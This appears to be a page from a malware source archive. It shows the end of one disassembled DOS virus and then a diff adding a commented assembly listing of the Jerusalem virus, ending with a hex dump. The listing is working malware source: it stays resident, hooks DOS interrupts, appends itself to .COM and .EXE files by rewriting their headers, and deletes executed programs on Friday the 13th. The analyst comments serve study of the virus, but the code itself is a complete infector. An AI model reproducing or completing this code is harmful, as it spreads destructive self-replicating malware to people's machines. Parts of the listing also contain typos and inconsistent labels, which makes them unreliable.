int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
loc_39:
jc loc_40 ; Jump if carry Set
mov cx,1Ch
mov dx,4Fh
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_40:
jc loc_41 ; Jump if carry Set
cmp ax,cx
jne loc_42 ; Jump if not equal
mov dx,ds:data_16e
mov cx,ds:data_17e
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
loc_41:
jc loc_42 ; Jump if carry Set
xor dx,dx ; Zero register
mov cx,710h
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_42:
cmp word ptr cs:data_44e,0
je loc_43 ; Jump if equal
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
loc_43:
cmp word ptr cs:data_37e,0FFFFh
je loc_44 ; Jump if equal
mov bx,cs:data_37e
mov dx,cs:data_39e
mov cx,cs:data_40e
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
lds dx,dword ptr cs:data_42e ; Load 32 bit ptr
mov cx,cs:data_38e
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
lds dx,dword ptr cs:data_27e ; Load 32 bit ptr
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
loc_44:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf ; Pop flags
jmp dword ptr cs:data_25e
db 11 dup (0)
db 4Dh, 63h, 21h, 4
db 13 dup (0)
db 5Bh, 0, 0, 0, 2Bh, 0
db 0FFh
db 17 dup (0FFh)
db 'E:\SV\EXECDOS.BAT'
db 0
db 'EXECDOS', 0Dh
db 0, 7Dh, 0, 0, 80h, 0
db 53h, 0Eh, 5Ch, 0, 53h, 0Eh
db 6Ch, 4Dh, 63h, 21h, 0, 10h
db 'EC=F:\DOS\C'
db 0E9h, 92h, 0, 73h, 55h, 4Dh
db 73h, 44h, 6Fh, 73h, 0, 1
db 0B8h, 22h, 0, 0, 0, 1Ah
db 3, 2Ch, 2, 70h, 0
loc_45:
xchg ax,dx
push cs
sub [bp+si],bx
;* jmp short loc_46 ;*(0781)
db 0EBh, 4
db 63h, 21h, 0D0h, 59h
int_21h_entry endp
seg_a ends
end start
MSDOS/J-Index/Virus.MSDOS.Unknown.jerusale.asm
+790
View File
@@ -0,0 +1,790 @@
CODE SEGMENT
;The following is a disassembled, structured and commented listing of the
;Jerusalem .COM and .EXE infector virus. All comments, structure inclusions
;
; INTERPATH
; 4423 Cheeney Street
; Santa Clara, CA 95054
;-----------------------------------------------------------------------;
; THE "JERUSALEM" VIRUS ;
;-----------------------------------------------------------------------;
;
ORG 100H ;
;
;-----------------------------------------------------------------------;
; JERUSALEM VIRUS ;
;-----------------------------------------------------------------------;
BEGIN_COM: ; COM FILES START HERE
JMP CONTINUE ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A0103 DB 073H,055H
MS_DOS DB 'MsDos' ;
DB 000H,001H,015H,018H
TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED!
DB 000H
A0010 DB 000H
A0011 DW 100H ;HOST SIZE (BEFORE INFECTION)
OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC)
OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR
OLD_24 DW 0556H,16A5H ;001B
A_FLAG DW 7E48H ;???
A0021 DB 000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H
A002C DW 0 ;A SEGMENT
DB 000H,000H
A0030 DB 000H
A0031 DW 0178EH ;OLD ES VALUE
A0033 DW 0080H ;
;
EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035
DW 80H ;COMMAND LINE ADDRESS
DW 178EH ;+4
DW 005CH ;FCB #1 ADDRESS
DW 178EH ;+8
DW 006CH ;FCB #2 ADDRESS
DW 0178EH ;+12
;
HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043
HOST_SS DW 347AH ;(AT TIME OF INFECTION)
HOST_IP DW 00C5H ;
HOST_CS DW 347AH ;
;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF
;
A004B DW 0F010H ;
A004D DB 82H ;
A004E DB 0 ;
EXE_HDR DB 1CH DUP (?) ;004F
A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST
HANDLE DW 0005H ;0070
HOST_ATT DW 0020H ;0072
HOST_DATE DW 0021H ;0074
HOST_TIME DW 002DH ;0076
BLOCK_SIZE DW 512 ;512 BYTES/BLOCK
A007A DW 0010H
HOST_SIZE DW 27C0H,0001H ;007C
HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME
COMMAND_COM DB 'COMMAND.COM'
DB 1
A0090 DB 0,0,0,0,0
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
CONTINUE: ;
CLD ;
MOV AH,0E0H ;DO A ???...
INT 21H ;
;
CMP AH,0E0H ;
JNC L01B5 ;
CMP AH,3 ;
JC L01B5 ;
;
MOV AH,0DDH ;
MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE
MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE
ADD SI,DI ;SI = BEGINNING OF HOST CODE
MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?)
INT 21H ;
;
L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H
ADD AX,10H ;
MOV SS,AX ;SS = TWEEKed CS
MOV SP,700H ;SP = END OF OUR CODE (VIRUS)
;
;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF
;
PUSH AX ;JMP FAR CS+10H:IP-100H
MOV AX,offset BEGIN_EXE - offset BEGIN_COM
PUSH AX ;
RETF ;
;
;---------------------------------------;
ORG 0C5h ;
;---------------------------------------;
;
BEGIN_EXE: ;EXE FILES START HERE
CLD ;
PUSH ES ;
;
MOV CS:[A0031],ES ;
MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES
MOV CS:[EXEC_BLOCK+8],ES ;
MOV CS:[EXEC_BLOCK+12],ES ;
;
MOV AX,ES ;TWEEK ES SAME AS CS ABOVE
ADD AX,10H ;
ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE
ADD CS:[HOST_SS],AX ;
;
MOV AH,0E0H ;
INT 21H ;
;
CMP AH,0E0H ;
JNC L0106 ;00F1 7313
;
CMP AH,3 ;
POP ES ;00F6
MOV SS,CS:[HOST_SS] ;
MOV SP,CS:[HOST_SP] ;
JMP far CS:[HSOT_IP] ;
;
L0106: XOR AX,AX ;0106 33C0
MOV ES,AX ;0108 8EC0
MOV AX,ES:[03FC] ;010A 26A1FC03
MOV CS:[A004B],AX ;010E 2EA34B00
MOV AL,ES:[03FE] ;0112 26A0FE03
MOV CS:[A004D],AL ;0116 2EA24D00
MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5
MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB
POP AX ;0127 58
ADD AX,10H ;0128 051000
MOV ES,AX ;012B 8EC0
PUSH CS ;012D 0E
POP DS ;012E 1F
MOV CX,710H ;SIZE OF VIRUS CODE
SHR CX,1 ;0132 D1E9
XOR SI,SI ;0134 33F6
MOV DI,SI ;0136 8BFE
PUSH ES ;0138 06
MOV AX,0142 ;0139 B84201
PUSH AX ;013C 50
JMP 0000:03FC ;013D EAFC030000
;
MOV AX,CS ;0142 8CC8
MOV SS,AX ;0144 8ED0
MOV SP,700H ;0146 BC0007
XOR AX,AX ;0149 33C0
MOV DS,AX ;014B 8ED8
MOV AX,CS:[A004B] ;014D 2EA14B00
MOV [03FC],AX ;0151 A3FC03
MOV AL,CS:[A004D] ;0154 2EA04D00
MOV [03FE],AL ;0158 A2FE03
MOV BX,SP ;015B 8BDC
MOV CL,04 ;015D B104
SHR BX,CL ;015F D3EB
ADD BX,+10 ;0161 83C310
MOV CS:[A0033],BX ;
;
MOV AH,4AH ;
MOV ES,CS:[A0031] ;
INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS
;
MOV AX,3521 ;
INT 21H ;GET VECTOR
MOV CS:[OLD_21],BX ;
MOV CS:[OLD_21+2],ES ;
;
PUSH CS ;0181 0E
POP DS ;0182 1F
MOV DX,offset NEW_INT_21 ;0183 BA5B02
MOV AX,2521 ;
INT 21H ;SAVE VECTOR
;
MOV ES,[A0031] ;018B 8E063100
MOV ES,ES:[A002C] ;018F 268E062C00
XOR DI,DI ;0194 33FF
MOV CX,7FFFH ;0196 B9FF7F
XOR AL,AL ;0199 32C0
REPNE SCASB ;019C AE
CMP ES:[DI],AL ;019D 263805
LOOPNZ 019B ;01A0 E0F9
MOV DX,DI ;01A2 8BD7
ADD DX,+03 ;01A4 83C203
MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
PUSH ES ;
POP DS ;
PUSH CS ;
POP ES ;
MOV BX,35H ;
;
PUSH DS ;01B1 ;
PUSH ES ;
PUSH AX ;
PUSH BX ;
PUSH CX ;
PUSH DX ;
;
MOV AH,2AH ;
INT 21H ;GET DATE
;
MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE"
;
CMP CX,1987 ;IF 1987...
JE L01F7 ;...JUMP
CMP AL,5 ;IF NOT FRIDAY...
JNE L01D8 ;...JUMP
CMP DL,0DH ;IF DATE IS NOT THE 13th...
JNE L01D8 ;...JUMP
INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT
JMP L01F7 ;
;
L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR
INT 21H ;GET VECTOR
MOV CS:[OLD_08],BX ;
MOV CS:[OLD_08],ES ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV Word ptr [A_FLAG],7E90H ;
;
MOV AX,2508H ;SET NEW CLOCK TIC HANDLER
MOV DX,offset NEW_08 ;
INT 21H ;SET VECTOR
;
L01F7: POP DX ;
POP CX ;
POP BX ;
POP AX ;
POP ES ;
POP DS ;
PUSHF ;
CALL far CS:[OLD_21] ;
PUSH DS ;
POP ES ;
;
MOV AH,49H ;
INT 21H ;FREE ALLOCATED MEMORY
;
MOV AH,4DH ;
INT 21H ;GET RETURN CODE OF A SUBPROCESS
;
;---------------------------------------;
; THIS IS WHERE WE REMAIN RESIDENT ;
;---------------------------------------;
MOV AH,31H ;
MOV DX,0600H ;020F ;
MOV CL,04 ;
SHR DX,CL ;
ADD DX,10H ;
INT 21H ;TERMINATE AND REMAIN RESIDENT
;
;---------------------------------------;
NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER
IRET ;
;
;-----------------------------------------------------------------------;
; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ;
;-----------------------------------------------------------------------;
NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E
JNE N08_10 ;IF ... JUMP
;
PUSH AX ;
PUSH BX ;
PUSH CX ;
PUSH DX ;
PUSH BP ;
MOV AX,0602H ;SCROLL UP TWO LINES
MOV BH,87H ;INVERSE VIDEO ATTRIBUTE
MOV CX,0505H ;UPPER LEFT CORNER
MOV DX,1010H ;LOWER RIGHT CORNER
INT 10H ;
POP BP ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
;
N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE
JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO
MOV Word ptr CS:[A_FLAG],1 ;
;
PUSH AX ;????? IS THIS SOME KIND OF DELAY ?????
PUSH CX ;*** COMMENTS SOLICITED ****
PUSH SI ;
MOV CX,4001H ;
REP LODSB ;
POP SI ;
POP CX ;
POP AX ;
;
N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR
;
;-----------------------------------------------------------------------;
; NEW INTERRUPT 21 HANDLER ;
;-----------------------------------------------------------------------;
NEW_21: PUSHF ;025B ;
CMP AH,0E0H ;IF A E0 REQUEST...
JNE N21_10 ;
MOV AX,300H ;...RETURN AX = 300H
POPF ; (OUR PUSHF)
IRET ;
;
N21_10: CMP AH,0DDH ;0266 ;
JE N21_30 ;IF DDH...JUMP TO _30
CMP AH,0DEH ;
JE N21_40 ;IF DEH...JUMP TO _40
CMP AX,4B00H ;IF SPAWN A PROG...
JNE N21_20 ;
JMP N21_50 ;...JUMP TO _50
;
N21_20: POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR
;
N21_30: POP AX ;REMOVE OUR (PUSHF)
POP AX ;?
MOV AX,100H ;
MOV CS:[000A],AX ;
POP AX ;
MOV CS:[000C],AX ;
REP MOVSB ;
POPF ; (OUR PUSHF)
MOV AX,CS:[000F] ;
JMP far CS:[000A] ;
;
N21_40: ADD SP,+06 ;0298 ;
POPF ; (OUR PUSHF)
MOV AX,CS ;
MOV SS,AX ;
MOV SP,710H ;SIZE OF VIRUS CODE
PUSH ES ;
PUSH ES ;02A4 06
XOR DI,DI ;02A5 33FF
PUSH CS ;02A7 0E
POP ES ;02A8 07
MOV CX,0010 ;02A9 B91000
MOV SI,BX ;02AC 8BF3
MOV DI,0021 ;02AE BF2100
REP MOVSB ;02B2 A4
MOV AX,DS ;02B3 8CD8
MOV ES,AX ;02B5 8EC0
MUL Word ptr CS:[A007A] ;02B7 2EF7267A00
ADD AX,CS:[002B] ;02BC 2E03062B00
ADC DX,+00 ;02C1 83D200
DIV Word ptr CS:[A007A] ;02C4 2EF7367A00
MOV DS,AX ;02C9 8ED8
MOV SI,DX ;02CB 8BF2
MOV DI,DX ;02CD 8BFA
MOV BP,ES ;02CF 8CC5
MOV BX,CS:[002F] ;02D1 2E8B1E2F00
OR BX,BX ;02D6 0BDB
JE 02ED ;02D8 7413
MOV CX,8000 ;02DA B90080
REP MOVSW ;02DE A5
ADD AX,1000 ;02DF 050010
ADD BP,1000 ;02E2 81C50010
MOV DS,AX ;02E6 8ED8
MOV ES,BP ;02E8 8EC5
DEC BX ;02EA 4B
JNE 02DA ;02EB 75ED
MOV CX,CS:[002D] ;02ED 2E8B0E2D00
REP MOVSB ;02F3 A4
POP AX ;02F4 58
PUSH AX ;02F5 50
ADD AX,0010 ;02F6 051000
ADD CS:[0029],AX ;02F9 2E01062900
ADD CS:[0025],AX ;02FE 2E01062500
MOV AX,CS:[0021] ;0303 2EA12100
POP DS ;0307 1F
POP ES ;0308 07
MOV SS,CS:[0029] ;0309 2E8E162900
MOV SP,CS:[0027] ;030E 2E8B262700
JMP far CS:[0023] ;0313 2EFF2E2300
;
;---------------------------------------;
; IT IS TIME FOR THIS FILE TO DIE... ;
; THIS IS WHERE IT GETS DELETED ! ;
;---------------------------------------;
N21_5A: XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE (ATT=0)
;
MOV AH,41H ;
INT 21H ;DELETE A FILE
;
MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;
;
;---------------------------------------;
; START INFECTION ;
;---------------------------------------;
N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE...
JE N21_5A ;...JUMP
;
MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN
MOV Word ptr CS:[A008F],0 ;
MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME
MOV word ptr CS:[HOST_NAME+2],DS ;
;
;INFECTION PROCESS OCCURS HERE ;
PUSH AX ;034C 50
PUSH BX ;034D 53
PUSH CX ;034E 51
PUSH DX ;034F 52
PUSH SI ;0350 56
PUSH DI ;0351 57
PUSH DS ;0352 1E
PUSH ES ;0353 06
CLD ;0354 FC
MOV DI,DX ;0355 8BFA
XOR DL,DL ;0357 32D2
CMP Byte ptr [DI+01],3A ;0359 807D013A
JNE L0364 ;035D 7505
MOV DL,[DI] ;035F 8A15
AND DL,1F ;0361 80E21F
;
L0364: MOV AH,36 ;
INT 21H ;GET DISK FREE SPACE
CMP AX,-1 ;0368 3DFFFF
JNE L0370 ;036B 7503
L036D: JMP I_90 ;036D E97702
;
L0370: MUL BX ;0370 F7E3
MUL CX ;0372 F7E1
OR DX,DX ;0374 0BD2
JNE L037D ;0376 7505
CMP AX,710H ;0378 3D1007
JC L036D ;037B 72F0
L037D: MOV DX,word ptr CS:[HOST_NAME]
PUSH DS ;0382 1E
POP ES ;0383 07
XOR AL,AL ;0384 32C0
MOV CX,41 ;0386 B94100
REPNE SCASB ;038A AE
MOV SI,word ptr CS:[HOST_NAME]
L0390: MOV AL,[SI] ;0390 8A04
OR AL,AL ;0392 0AC0
JE L03A4 ;0394 740E
CMP AL,61 ;0396 3C61
JC L03A1 ;0398 7207
CMP AL,7A ;039A 3C7A
JA L03A1 ;039C 7703
SUB Byte ptr [SI],20 ;039E 802C20
L03A1: INC SI ;03A1 46
JMP L0390 ;03A2 EBEC
;
L03A4: MOV CX,000B ;03A4 B90B00
SUB SI,CX ;03A7 2BF1
MOV DI,offset COMMAND_COM ;03A9 BF8400
PUSH CS ;03AC 0E
POP ES ;03AD 07
MOV CX,000B ;03AE B90B00
REPE CMPSB ;03B2 A6
JNE L03B8 ;03B3 7503
JMP I_90 ;03B5 E92F02
;
L03B8: MOV AX,4300H ;
INT 21H ;CHANGE FILE MODE
JC L03C4 ;03BD 7205
;
MOV CS:[HOST_ATT],CX ;03BF ;
L03C4: JC L03EB ;03C4 7225
XOR AL,AL ;03C6 32C0
MOV CS:[A004E],AL ;03C8 2EA24E00
PUSH DS ;03CC 1E
POP ES ;03CD 07
MOV DI,DX ;03CE 8BFA
MOV CX,41 ;03D0 B94100
REPNZ SCASB ;03D4 AE
CMP Byte ptr [DI-02],4D ;03D5 807DFE4D
JE L03E6 ;03D9 740B
CMP Byte ptr [DI-02],6D ;03DB 807DFE6D
JE L03E6 ;03DF 7405
INC Byte ptr CS:[A004E] ;03E1 2EFE064E00
;
L03E6: MOV AX,3D00H ;
INT 21H ;OPEN FILE READ ONLY
L03EB: JC L0447 ;
MOV CS:[HANDLE],AX ;03ED ;
;
MOV BX,AX ;MOVE TO END OF FILE -5
MOV AX,4202 ;
MOV CX,-1 ;FFFFFFFB
MOV DX,-5 ;
INT 21H ;MOVE FILE POINTER
JC L03EB ;
;
ADD AX,5 ;0400 ;
MOV CS:[A0011],AX ;?SAVE HOST SIZE
;
MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST
MOV DX,offset A006B ;
MOV AX,CS ;
MOV DS,AX ;
MOV ES,AX ;
MOV AH,3FH ;
INT 21H ;READ FROM A FILE
;
MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos'
MOV SI,offset MS_DOS ;
REPE CMPSB ;
JNE L0427 ;
MOV AH,3E ;IF == 'MsDos'...
INT 21H ;CLOSE FILE
JMP I_90 ;...PASS CONTROL TO DOS
;
L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR
INT 21H ;GET VECTOR
MOV [OLD_24],BX ;
MOV [OLD_24+2],ES ;
;
MOV DX,offset NEW_24 ;
MOV AX,2524 ;SET CRITICAL ERROR VECTOR
INT 21H ;SET VECTOR
;
LDS DX,dword ptr [HOST_NAME];
XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
L0447: JC L0484 ;
;
MOV BX,CS:[HANDLE] ;
MOV AH,3E ;
INT 21H ;CLOSE FILE
;
MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE
;
MOV AX,3D02 ;
INT 21H ;OPEN FILE R/W
JC L0484 ;
;
MOV CS:[HANDLE],AX ;0460 2EA37000
MOV AX,CS ;0464 8CC8
MOV DS,AX ;0466 8ED8
MOV ES,AX ;0468 8EC0
MOV BX,[HANDLE] ;046A 8B1E7000
MOV AX,5700 ;046E B80057
INT 21H ;GET/SET FILE DATE TIME
;
MOV [HOST_DATE],DX ;0473 89167400
MOV [HOST_TIME],CX ;0477 890E7600
MOV AX,4200 ;047B B80042
XOR CX,CX ;047E 33C9
MOV DX,CX ;0480 8BD1
INT 21H ;MOVE FILE POINTER
L0484: JC L04C3 ;0484 723D
;
CMP Byte ptr [A004E],00 ;0486 803E4E0000
JE L0490 ;048B 7403
JMP L04E6 ;048D EB57
;
NOP ;048F 90
L0490: MOV BX,1000 ;0490 BB0010
MOV AH,48 ;0493 B448
INT 21H ;ALLOCATE MEMORY
JNC L04A4 ;0497 730B
;
MOV AH,3E ;0499 B43E
MOV BX,[HANDLE] ;049B 8B1E7000
INT 21H ;CLOSE FILE (OBVIOUSLY)
JMP I_90 ;04A1 E94301
;
L04A4: INC Word ptr [A008F] ;04A4 FF068F00
MOV ES,AX ;04A8 8EC0
XOR SI,SI ;04AA 33F6
MOV DI,SI ;04AC 8BFE
MOV CX,710H ;04AE B91007
REP MOVSB ;04B2 A4
MOV DX,DI ;04B3 8BD7
MOV CX,[A0011] ;?GET HOST SIZE - YES
MOV BX,[70H] ;04B9 8B1E7000
PUSH ES ;04BD 06
POP DS ;04BE 1F
MOV AH,3FH ;04BF B43F
INT 21H ;READ FROM A FILE
L04C3: JC L04E1 ;04C3 721C
;
ADD DI,CX ;04C5 03F9
;
XOR CX,CX ;POINT TO BEGINNING OF FILE
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
;
MOV SI,offset MS_DOS ;04D0 BE0500
MOV CX,5 ;04D3 B90500
REP CS:MOVSB ;04D7 2EA4
MOV CX,DI ;04D9 8BCF
XOR DX,DX ;04DB 33D2
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L04E1: JC L04F0 ;
JMP L05A2 ;
;
;---------------------------------------;
; READ EXE HEADER ;
;---------------------------------------;
L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER
MOV DX,offset EXE_HDR ;
MOV AH,3F ;
INT 21H ;READ FILE
JC L053C ;
;
;---------------------------------------;
; TWEEK EXE HEADER TO INFECTED HSOT ;
;---------------------------------------;
MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO
MOV AX,[EXE_HDR+14] ; SS
MOV [HOST_SS],AX ;
MOV AX,[EXE_HDR+16] ; SP
MOV [HOST_SP],AX ;
MOV AX,[EXE_HDR+20] ; IP
MOV [HOST_IP],AX ;
MOV AX,[EXE_HDR+22] ; CS
MOV [HOST_CS],AX ;
MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS)
CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512
JZ L051B ;IF FILE SIZE==0...JMP
DEC AX ;
L051B: MUL Word ptr [BLOCK_SIZE] ;
ADD AX,[EXE_HDR+2] ;
ADC DX,0 ;AX NOW = FILE SIZE
;
ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND
ADC DX,0 ;
AND AX,0FFF0H ;
MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS
MOV [HOST_SIZE+2],DX ;
;
ADD AX,710H ;(SIZE OF VIRUS)
ADC DX,0 ;
L053C: JC L0578 ;IF > FFFFFFFF...JMP
DIV Word ptr [BLOCK_SIZE] ;
OR DX,DX ;
JE L0547 ;
INC AX ;
L0547: MOV [EXE_HDR+4],AX ;
MOV [EXE_HDR+2],DX ;
;---------------;
MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE
MOV DX,[HOST_SIZE+2] ;
DIV Word ptr [A007A] ;
SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR
MOV [EXE_HDR+22],AX ;VALUE OF CS
MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP
MOV [EXE_HDR+14],AX ;VALUE OF SS
MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP
;---------------;
XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR)
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
L0578: JC L0584 ;
;
;---------------------------------------;
; WRITE INFECTED EXE HEADER ;
;---------------------------------------;
MOV CX,1CH ;
MOV DX,offset EXE_HDR ;
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L0584: JC L0597 ;
CMP AX,CX ;
JNE L05A2 ;
;
MOV DX,[HOST_SIZE] ;POINT TO END OF FILE
MOV CX,[HOST_SIZE+2] ;
MOV AX,4200 ;
INT 21H ;MOVE FILE POINTER
L0597: JC L05A2 ;
;
;---------------------------------------;
; WRITE VIRUS CODE TO END OF HOST ;
;---------------------------------------;
XOR DX,DX ;
MOV CX,710H ;(SIZE OF VIRUS)
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
;
L05A2: CMP Word ptr CS:[008F],0 ;IF...
JZ L05AE ;...SKIP
MOV AH,49H ;
INT 21H ;FREE ALLOCATED MEMORY
;
L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ...
JE I_90 ;...SKIP
;
MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME
MOV DX,CS:[HOST_DATE] ;
MOV CX,CS:[HOST_TIME] ;
MOV AX,5701H ;
INT 21H ;GET/SET FILE DATE/TIME
;
MOV AH,3EH ;
INT 21H ;CLOSE FILE
;
LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE
MOV CX,CS:[HOST_ATT] ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
;
LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER
MOV AX,2524H ;
INT 21H ;SET VECTOR
;
I_90: POP ES ;
POP DS ;
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;PASS CONTROL TO DOS
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos......
;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H
;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~...............
;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l
;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M
;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\..
;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC
;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'..
;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM.
;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s..
;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w..
;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P
;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9
;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@...
;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.|
;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C
;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..#
;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s
;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9
;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|.
;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K
;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S
;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1.
;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!.........
;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.&
;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8.
;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5
;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F...
;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u.
;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!...
;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8
;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X.....
;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41:
